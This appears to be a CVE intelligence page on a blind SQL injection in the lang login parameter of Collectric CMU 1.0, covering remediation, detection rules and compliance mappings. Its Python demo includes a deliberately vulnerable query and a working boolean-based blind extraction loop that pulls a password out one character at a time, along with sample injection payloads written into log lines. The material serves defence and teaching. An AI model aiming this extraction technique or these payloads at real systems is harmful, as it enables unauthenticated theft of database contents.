CVE-2018-25379
Severity: High
Weakness Type: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection')
Published: May 25, 2026  ·  Modified: Jun 1, 2026  ·  Source: NVD
CVSS v3: 8.2
🔗 NVD Official
📄 Description (English)

Collectric CMU 1.0 contains a boolean-based blind SQL injection vulnerability in the lang parameter that allows unauthenticated attackers to manipulate database queries during authentication. Attackers can inject SQL code through the lang parameter in login requests to extract sensitive information from the database using time-based blind techniques.

🤖 AI Executive Summary

CVE-2018-25379 is a high-severity (CVSS 3.1 base score 8.2) unauthenticated SQL injection in Collectric CMU 1.0, reachable through the lang parameter of the login request. Because the parameter is processed before any credential check (PR:N), an attacker can use boolean-based and time-based blind techniques to read database contents (C:H) and partially tamper with them (I:L) without ever logging in. No vendor patch is listed, so affected deployments depend entirely on compensating controls until the product is replaced or fixed.

🤖 AI Intelligence Analysis (analyzed: May 29, 2026 02:03)
🇸🇦 Saudi Arabia Impact Assessment
This vulnerability affects Saudi organizations that expose a Collectric CMU 1.0 login interface. Sectors most at risk: government agencies running legacy authentication systems; SAMA-regulated banks where CMU is tied into authentication infrastructure; healthcare providers (MOH) managing patient data access; telecommunications operators (STC, Mobily) running subscriber management systems; and energy-sector operators (ARAMCO, SEC) using it for operational technology access control. Because the flaw sits in the login request and needs no credentials, an attacker can read database contents without ever authenticating.
🏢 Affected Saudi Sectors
Government, Banking, Healthcare, Energy, Telecommunications, Critical Infrastructure
⚖️ Saudi Risk Score (AI)
8.7 / 10.0
🔧 Remediation Steps (English)
Immediate Actions:
1. Inventory every system running Collectric CMU 1.0 and, where the service allows it, isolate those hosts from production networks until a fix is in place
2. Add Web Application Firewall (WAF) rules that block SQL injection patterns in the lang parameter. Treat this as a stopgap: WAF signatures can be evaded with encoding and comment tricks, and they do not remove the flaw
3. Monitor authentication logs for lang values containing SQL syntax characters (', ", --, ;, /*)

Compensating Controls:
1. Validate input with an allowlist: accept only the language codes the deployment actually serves (e.g. ar, en) or a strict pattern such as ^[a-z]{2,3}(-[A-Za-z]{2,4})?$, and reject everything else before it reaches the query
2. Where source code access is available, rewrite the affected query with parameterized queries/prepared statements. This is the actual fix; every other item here only reduces exposure
3. Run the database account used by CMU with least privilege: read-only access to the tables the login path needs, no DDL, and no file or OS-command functions
4. Enable database query logging and audit all authentication attempts
5. Rate-limit the login endpoint. Blind SQL injection extracts data one yes/no question per request, so throttling directly slows exfiltration as well as brute force
6. Deploy intrusion detection signatures for SQL injection patterns

Detection Rules:
1. Alert on any lang value that fails the allowlist above. Matching on quotes, comment syntax (--, /*) and keywords (UNION, SELECT, WHERE, OR) works as a fallback, but it misses time-based payloads built from SLEEP(), BENCHMARK(), WAITFOR DELAY or pg_sleep() and can false-positive on legitimate codes (lang=or is a valid ISO 639-1 code)
2. Baseline login response time and alert on responses that are seconds slower than normal, correlated with the lang value of the same request; that delay is the signal a time-based blind attack relies on
3. Track failed authentication attempts with malformed lang parameters, especially long runs from a single source address
4. Log all database errors from authentication queries, but do not rely on them: boolean-based and time-based blind payloads are built to be valid SQL and produce no error

Long-term:
1. Migrate away from Collectric CMU 1.0 to a supported, patched solution
2. Conduct a security code review if migration is delayed
3. Keep the WAF SQL injection rules from the immediate actions in place until migration is complete
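As an added example (not code from this page or from Collectric), the following Python stands up a constructed SQLite schema standing in for a CMU-style login backend, shows the vulnerable string-built query beside the allowlisted, parameterized version from compensating-control steps 1 and 2, walks a boolean-based blind oracle through extracting a value one character per request so the detection rules have something concrete to catch, and runs the lang allowlist check over constructed access-log lines. Table and column names, function names, the regex and the sample log lines are all assumptions; nothing here reflects the real CMU schema or request format.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Accept only plain language tags such as en, ar, en-US (assumed policy; narrow it
# to the codes the deployment actually serves). Anything else is rejected and alerted.
LANG_RE = re.compile(r"[a-z]{2,3}(?:[-_][A-Za-z]{2,4})?")


def build_db():
    # Constructed in-memory stand-in for the login backend. The real CMU schema is
    # not public here, so table and column names are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Secret42')")
    conn.execute("CREATE TABLE ui_strings (lang TEXT, key TEXT, value TEXT)")
    conn.executemany("INSERT INTO ui_strings VALUES (?, ?, ?)",
                     [("en", "login", "Login"), ("ar", "login", "Login (ar)")])
    return conn


def login_label_vulnerable(conn, lang):
    # Deliberately vulnerable: lang is spliced into the SQL text, so a quote in it
    # rewrites the WHERE clause. Returns the label or "" when no row matches,
    # which is exactly the one-bit oracle a boolean-based blind attack needs.
    sql = "SELECT value FROM ui_strings WHERE lang = '%s' AND key = 'login'" % lang
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if rows else ""


def login_label_hardened(conn, lang):
    # Fix: allowlist the value first, then bind it as a parameter so the database
    # never parses it as SQL.
    if not LANG_RE.fullmatch(lang):
        raise ValueError("unsupported language code: %r" % lang)
    rows = conn.execute(
        "SELECT value FROM ui_strings WHERE lang = ? AND key = 'login'", (lang,)
    ).fetchall()
    return rows[0][0] if rows else ""


def blind_extract(oracle, column, table, max_len=16):
    # Boolean-based blind extraction against the vulnerable lookup: every request
    # asks "is character i of the secret equal to c?" and reads the answer from
    # whether the English label came back. No error and no UNION output is needed,
    # which is why error logs alone do not detect this technique.
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    secret = ""
    for i in range(1, max_len + 1):
        for c in charset:
            payload = "en' AND (SELECT substr(%s,%d,1) FROM %s LIMIT 1) = '%s'--" % (
                column, i, table, c)
            if oracle(payload):
                secret += c
                break
        else:
            break  # no character matched: end of the value
    return secret


def flag_lang_values(log_lines):
    # Detection rule 1 as an allowlist rather than a keyword list: a keyword match
    # misses time-based payloads built from sleep()/benchmark()/waitfor and
    # false-positives on legitimate tags (lang=or is Odia), while "not a language
    # tag" catches both. Returns the offending decoded lang values.
    flagged = []
    for line in log_lines:
        target = line.split('"')[1].split(" ")[1]  # request-target of "GET /x HTTP/1.1"
        for value in parse_qs(urlsplit(target).query).get("lang", []):
            if not LANG_RE.fullmatch(value):
                flagged.append(value)
    return flagged


# Constructed access-log lines (combined log format) for the detector.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/May/2026:10:00:01 +0300] "GET /login?lang=en HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/May/2026:10:00:02 +0300] "GET /login?lang=ar HTTP/1.1" 200 530',
    '198.51.100.7 - - [25/May/2026:10:00:03 +0300] "GET /login?lang=en%27%20AND%201%3D1-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/May/2026:10:00:04 +0300] "GET /login?lang=en%27%20AND%20sleep(5)-- HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    conn = build_db()
    oracle = lambda p: login_label_vulnerable(conn, p) == "Login"
    print("extracted via blind SQLi:", blind_extract(oracle, "password", "users"))
    try:
        login_label_hardened(conn, "en' AND 1=1--")
    except ValueError as exc:
        print("hardened lookup rejected payload:", exc)
    print("flagged lang values:", flag_lang_values(SAMPLE_LOG))
```

Two points worth noticing when running it: the extraction loop never triggers a database error, so rule 4 in the detection list would stay silent while the password leaks one character per request, and the allowlist flags the time-based payload even though it contains none of the keywords the keyword rule lists. Rate limiting (compensating control 5) bites precisely because each recovered character costs the attacker up to 62 requests here.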
📋 Regulatory Compliance Mapping
🟢 NCA ECC 2024
ECC 2024 A.5.1.1 - Access Control Policy (authentication bypass risk)
ECC 2024 A.5.2.1 - User Registration and Access Management (unauthenticated access)
ECC 2024 A.5.3.1 - Password Management (authentication mechanism compromise)
ECC 2024 A.6.1.1 - Information Security Policies and Procedures (vulnerability management)
ECC 2024 A.12.2.1 - Change Management (patching and updates)
🔵 SAMA CSF
SAMA CSF ID.AM-2 - Asset Management (identify CMU systems)
SAMA CSF PR.AC-1 - Access Control (authentication compromise)
SAMA CSF PR.DS-2 - Data Security (database access control)
SAMA CSF DE.CM-1 - Detection and Analysis (monitoring for exploitation)
SAMA CSF RC.RP-1 - Recovery Planning (incident response)
🟡 ISO 27001:2022
ISO 27001:2022 A.5.15 - Access control (authentication mechanism)
ISO 27001:2022 A.5.16 - Identity management (unauthenticated access)
ISO 27001:2022 A.5.18 - Access rights (least privilege on the database account)
ISO 27001:2022 A.8.8 - Management of technical vulnerabilities (no patch available; compensating controls)
ISO 27001:2022 A.8.28 - Secure coding (parameterized queries, input validation)
ISO 27001:2022 A.5.24 - Information security incident management planning and preparation (incident response)
🟣 PCI DSS v4.0.1
PCI DSS 2.2 - Secure configuration of system components (authentication system hardening)
PCI DSS 6.2.4 - Protection against software attacks, including injection (SQL injection vulnerability)
PCI DSS 6.4.2 - Automated technical solution for public-facing web applications (WAF as compensating control)
PCI DSS 8.3 - Strong authentication for users and administrators (authentication bypass)
PCI DSS 10.2 - Audit logs to support detection of anomalies and suspicious activity (audit trails for authentication)
📊 CVSS Score
8.2 / 10.0 — High
📊 CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Attack Vector: N — Network
Attack Complexity: L — Low
Privileges Required: N — None
User Interaction: N — None
Scope: U — Unchanged
Confidentiality: H — High
Integrity: L — Low
Availability: N — None
📋 Quick Facts
Severity: High
CVSS Score: 8.2
CWE: CWE-89
EPSS: 0.12%
Exploit: No
Patch: ✗ No
Published: 2026-05-25
Source Feed: nvd
🇸🇦 Saudi Risk Score
8.7 / 10.0 — Saudi Risk
Priority: CRITICAL
🏷️ Tags
CWE-89